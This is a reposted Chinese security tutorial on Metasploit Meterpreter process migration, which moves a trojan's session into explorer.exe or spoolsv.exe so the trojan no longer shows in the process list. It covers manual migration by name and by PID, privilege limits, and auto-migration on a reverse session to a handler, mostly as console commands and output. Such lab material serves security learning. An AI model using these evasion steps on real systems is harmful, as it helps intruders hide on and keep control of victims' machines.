1. 威客安全首页
  2. 安全资讯

原创干货 | Metasploit_之_meterpreter 进程迁移

原创干货 | Metasploit_之_meterpreter 进程迁移
点击上方“蓝字”带你去看小星星


原创干货 | Metasploit_之_meterpreter 进程迁移

正常使用exe上线的情况下,会在任务管理器或者使用tasklist命令就可以看到我们的进程,那么就很容易被发现。

所以我们就用把我们的进程迁移到其他原有的进程上面,相当于寄生在别的正常的进程上面。

原创干货 | Metasploit_之_meterpreter 进程迁移


原创干货 | Metasploit_之_meterpreter 进程迁移
手动迁移



列出所有的进程      ps
meterpreter > ps
Process List============
 PID   PPID  Name               Arch  Session  User            Path ---   ----  ----               ----  -------  ----            ---- 0     0     [System Process]                                   4     0     System                                             108   552   svchost.exe                                        276   4     smss.exe                                           368   356   csrss.exe                                          372   552   svchost.exe                                        456   356   wininit.exe                                        496   628   csrss.exe                                          552   456   services.exe                                       560   456   lsass.exe                                          572   456   lsm.exe                                            688   552   svchost.exe                                        752   552   vmacthlp.exe                                       796   552   svchost.exe                                        864   552   svchost.exe                                        924   552   svchost.exe                                        968   552   svchost.exe1060  552   svchost.exe                                        1128  552   spoolsv.exe                                        1168  552   svchost.exe                                        1244  552   sppsvc.exe                                         1296  552   svchost.exe                                        1332  2356  explorer.exe       x64   2        liuwx-PCadmin  C:WindowsExplorer.EXE 1380  924   dwm.exe            x64   2        liuwx-PCadmin  C:Windowssystem32Dwm.exe 1404  688   WmiPrvSE.exe                                       1436  552   VGAuthService.exe                                  1456  552   dllhost.exe                                        1588  552   vmtoolsd.exe                                       1632  552   taskhost.exe       x64   2        liuwx-PCadmin  C:Windowssystem32taskhost.exe 1788  628   winlogon.exe                                       1872  552   msdtc.exe                                          2152  552   taskhost.exe                                       2228  864   audiodg.exe        x64   0                         2252  1332  8080.exe           x64   2        liuwx-PCadmin  C:UsersadminDesktop8080.exe 2324  552   svchost.exe                                        2580  1332  vmtoolsd.exe       x64   2        liuwx-PCadmin  C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2596  552   SearchIndexer.exe

原创干货 | Metasploit_之_meterpreter 进程迁移


查看当前进程  :getpid
meterpreter > getpid Current pid: 2252
C:UsersadminDesktop8080.exe    这个是我们当前的进程

原创干货 | Metasploit_之_meterpreter 进程迁移


以进程名迁移:迁移到:explorer.exe
meterpreter > migrate -N explorer.exe[*] Migrating from 2252 to 1332...[*] Migration completed successfully.

原创干货 | Metasploit_之_meterpreter 进程迁移

迁移进程成功,我们 ps 查看进程

这个时候就会发现原有的:C:UsersadminDesktop8080.exe  这个进程就没得咯

原创干货 | Metasploit_之_meterpreter 进程迁移


以 PID 迁移:
假如要迁移到这个  spoolsv.exe ,他的 PID 是 1128migrate -P 1128
meterpreter > migrate -P 1128[*] Migrating from 1332 to 1128...[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)

原创干货 | Metasploit_之_meterpreter 进程迁移


这边的话是迁移失败,原因是权限的问题,因为我运行我的木马exe是没有过UAC的,所以权限比较,而spoolsv.exe这个进程是一个系统的权限进程,所以导致迁移进程失败


总结:高权限可以往低权限下迁移进程,低权限不能往高权限上进行迁移!


我这边重新以UAC运行木马

原创干货 | Metasploit_之_meterpreter 进程迁移


meterpreter > ps
Process List============
 PID   PPID  Name                    Arch  Session  User                          Path ---   ----  ----                    ----  -------  ----                          ---- 0     0     [System Process]                                                      4     0     System                  x64   0                                       108   552   svchost.exe             x64   0        NT AUTHORITYNETWORK SERVICE  C:Windowssystem32svchost.exe 276   4     smss.exe                x64   0        NT AUTHORITYSYSTEM           SystemRootSystem32smss.exe 336   2948  winlogon.exe            x64   1        NT AUTHORITYSYSTEM           C:Windowssystem32winlogon.exe 368   356   csrss.exe               x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32csrss.exe 372   552   svchost.exe             x64   0        NT AUTHORITYLOCAL SERVICE    C:Windowssystem32svchost.exe 376   1704  explorer.exe            x64   1        liuwx-PCliuwx                C:WindowsExplorer.EXE 456   356   wininit.exe             x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32wininit.exe 552   456   services.exe            x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32services.exe 560   456   lsass.exe               x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32lsass.exe 572   456   lsm.exe                 x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32lsm.exe 688   552   svchost.exe             x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32svchost.exe 752   552   vmacthlp.exe            x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware Toolsvmacthlp.exe 796   552   svchost.exe             x64   0        NT AUTHORITYNETWORK SERVICE  C:Windowssystem32svchost.exe 864   552   svchost.exe             x64   0        NT AUTHORITYLOCAL SERVICE    C:WindowsSystem32svchost.exe 924   552   svchost.exe             x64   0        NT AUTHORITYSYSTEM           C:WindowsSystem32svchost.exe 968   552   svchost.exe             x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32svchost.exe 1060  552   svchost.exe             x64   0        NT AUTHORITYSYSTEM           C:WindowsSystem32svchost.exe 1128  552   spoolsv.exe             x64   0        NT AUTHORITYSYSTEM           C:WindowsSystem32spoolsv.exe 1168  552   svchost.exe             x64   0        NT AUTHORITYLOCAL SERVICE    C:Windowssystem32svchost.exe 1244  552   sppsvc.exe              x64   0        NT AUTHORITYNETWORK SERVICE  C:Windowssystem32sppsvc.exe 1296  552   svchost.exe             x64   0        NT AUTHORITYLOCAL SERVICE    C:Windowssystem32svchost.exe 1304  2596  SearchFilterHost.exe    x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32SearchFilterHost.exe 1404  688   WmiPrvSE.exe            x64   0        NT AUTHORITYNETWORK SERVICE  C:Windowssystem32wbemwmiprvse.exe 1436  552   VGAuthService.exe       x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware ToolsVMware VGAuthVGAuthService.exe 1456  552   dllhost.exe             x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32dllhost.exe 1588  552   vmtoolsd.exe            x64   0        NT AUTHORITYSYSTEM           C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1636  2948  csrss.exe               x64   1        NT AUTHORITYSYSTEM           C:Windowssystem32csrss.exe 1704  336   userinit.exe            x64   1        liuwx-PCliuwx                C:Windowssystem32userinit.exe 1872  552   msdtc.exe               x64   0        NT AUTHORITYNETWORK SERVICE  C:WindowsSystem32msdtc.exe 2108  864   audiodg.exe             x64   0                                       2204  376   vmtoolsd.exe            x64   1        liuwx-PCliuwx                C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2324  552   svchost.exe             x64   0        NT AUTHORITYNETWORK SERVICE  C:Windowssystem32svchost.exe 2544  2596  SearchProtocolHost.exe  x64   1        liuwx-PCliuwx                C:Windowssystem32SearchProtocolHost.exe 2596  552   SearchIndexer.exe       x64   0        NT AUTHORITYSYSTEM           C:Windowssystem32SearchIndexer.exe 2740  376   8080.exe                x64   1        liuwx-PCliuwx                C:UsersliuwxDesktop8080.exe 2888  924   dwm.exe                 x64   1        liuwx-PCliuwx                C:Windowssystem32Dwm.exe 3012  552   taskhost.exe            x64   1        liuwx-PCliuwx                C:Windowssystem32taskhost.exe

原创干货 | Metasploit_之_meterpreter 进程迁移


再次迁移进程到 :spoolsv.exe PID 1128
meterpreter > migrate -P 1128[*] Migrating from 2476 to 1128...[*] Migration completed successfully.

原创干货 | Metasploit_之_meterpreter 进程迁移


这个时候就迁移进程成功了


meterpreter > getpidCurrent pid: 1128



原创干货 | Metasploit_之_meterpreter 进程迁移
上线自动迁移


迁移到指定进程            set autorunscript migrate -n explorer.exe    生成一个进程,并迁移到它里面      set AytoRunScript migrate -f

这边run之前,需要设置一下上线后自动迁移到那个进程

setautorunscript migrate ‐n explorer.exe

原创干货 | Metasploit_之_meterpreter 进程迁移

然后exploit运行到后台: exploit‐j ‐z

原创干货 | Metasploit_之_meterpreter 进程迁移


成功迁移进程!

自动迁移随机进程      set AytoRunScript migrate -f
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 192.168.136.130[*] Meterpreter session 3 opened (192.168.136.133:8888 -> 192.168.136.130:49175) at 2019-11-04 21:31:10 -0500[*] Session ID 3 (192.168.136.133:8888 -> 192.168.136.130:49175) processing AutoRunScript 'migrate -n explorer.exe'[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.[!] Example: run post/windows/manage/migrate OPTION=value [...]Interrupt: use the 'exit' command to quitmsf5 exploit(multi/handler) > [*] Current server process: Explorer.EXE (376)[+] Migrating to 376sessions [-] Could not migrate in to process.[-] undefined method `[]' for nil:NilClassInterrupt: use the 'exit' command to quitmsf5 exploit(multi/handler) > set AytoRunScript migrate -fAytoRunScript => migrate -fmsf5 exploit(multi/handler) > sessions
Active sessions===============
  Id  Name  Type                     Information                Connection  --  ----  ----                     -----------                ----------  3         meterpreter x64/windows  liuwx-PCliuwx @ LIUWX-PC  192.168.136.133:8888 -> 192.168.136.130:49175 (192.168.136.130)
msf5 exploit(multi/handler) > sessions 3[*] Starting interaction with 3...
meterpreter > getpid Current pid: 376

原创干货 | Metasploit_之_meterpreter 进程迁移


原创干货 | Metasploit_之_meterpreter 进程迁移


迁移成功!


原创干货 | Metasploit_之_meterpreter 进程迁移
原创干货 | Metasploit_之_meterpreter 进程迁移
原创干货 | Metasploit_之_meterpreter 进程迁移


给我【在看】

你也越好看!

原创干货 | Metasploit_之_meterpreter 进程迁移

原文始发于微信公众号(云众可信):原创干货 | Metasploit_之_meterpreter 进程迁移

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

15110186328

在线咨询:点击这里给我发消息

邮件:zhanglei@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code
X